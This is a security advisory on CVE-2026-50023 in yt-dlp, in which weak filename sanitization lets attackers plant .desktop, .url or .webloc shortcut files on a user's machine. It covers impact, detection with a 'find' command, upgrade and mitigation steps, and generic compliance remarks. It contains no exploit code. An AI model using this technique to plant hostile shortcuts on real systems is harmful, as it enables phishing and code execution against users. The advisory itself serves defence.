Executive Summary

CVE-2026-50023 is a vulnerability in yt-dlp, a command-line audio/video downloader, where an attacker can exploit insufficient filename sanitization to write arbitrary OS-shortcut files such as .desktop, .url, and .webloc to the user's filesystem.

These unsafe extensions were mistakenly included in an allowlist to preserve the functionality of the --write-link option, which allowed attackers to create malicious shortcut files during media or subtitle downloads.

This could lead to malicious file execution or phishing attacks by tricking users into opening harmful shortcuts.

The vulnerability was fixed in version 2026.06.09 by restricting the creation of these file types only to the --write-link functionality and improving filename sanitization.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can have serious impacts including the creation of malicious OS-shortcut files on your system without your consent.

Such malicious shortcuts could be used to execute arbitrary code, conduct phishing attacks, or compromise system confidentiality, integrity, and availability.

Because the exploit can be triggered remotely during media or subtitle downloads, it poses a high security risk with a CVSS base score of 8.3.

If exploited, attackers could gain control over parts of your system or trick users into executing harmful actions.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability involves the creation of arbitrary OS-shortcut files with extensions such as .desktop, .url, or .webloc by yt-dlp prior to version 2026.06.09. To detect exploitation on your system, you can search for unexpected or suspicious files with these extensions in user directories where yt-dlp downloads media or subtitles.

• Use commands to find recently created or modified shortcut files, for example:
• find ~/ -type f \( -name "*.desktop" -o -name "*.url" -o -name "*.webloc" \) -mtime -7
• Check yt-dlp download directories for unusual shortcut files.
• Monitor network traffic for suspicious downloads or commands invoking yt-dlp with options like --write-link or --write-subs that could trigger the vulnerability.

Useful 0 Not Useful 0

Mitigation Strategies

The primary mitigation is to upgrade yt-dlp to version 2026.06.09 or later, where the vulnerability is fixed by restricting the creation of unsafe shortcut file types to only the --write-link functionality.

If upgrading immediately is not possible, avoid using risky options such as --write-subs or any functionality that could trigger writing of shortcut files with unsafe extensions.

Additionally, review and sanitize any downloaded files with .desktop, .url, or .webloc extensions before opening or executing them.

Useful 0 Not Useful 0

Compliance Impact

CVE-2026-50023 allows a remote attacker to write arbitrary OS-shortcut files (.desktop, .url, .webloc) to a user's filesystem, potentially leading to phishing or arbitrary code execution. This vulnerability impacts the confidentiality, integrity, and availability of user systems, which are core principles in many compliance standards such as GDPR and HIPAA.

Because the vulnerability can lead to unauthorized file creation and possible system compromise, it may result in violations of data protection and security requirements mandated by these regulations. For example, GDPR requires appropriate technical measures to protect personal data, and HIPAA mandates safeguards to ensure the confidentiality and integrity of protected health information.

Therefore, failure to patch this vulnerability or mitigate its risks could lead to non-compliance with such standards due to increased risk of data breaches or unauthorized access.

Useful 0 Not Useful 0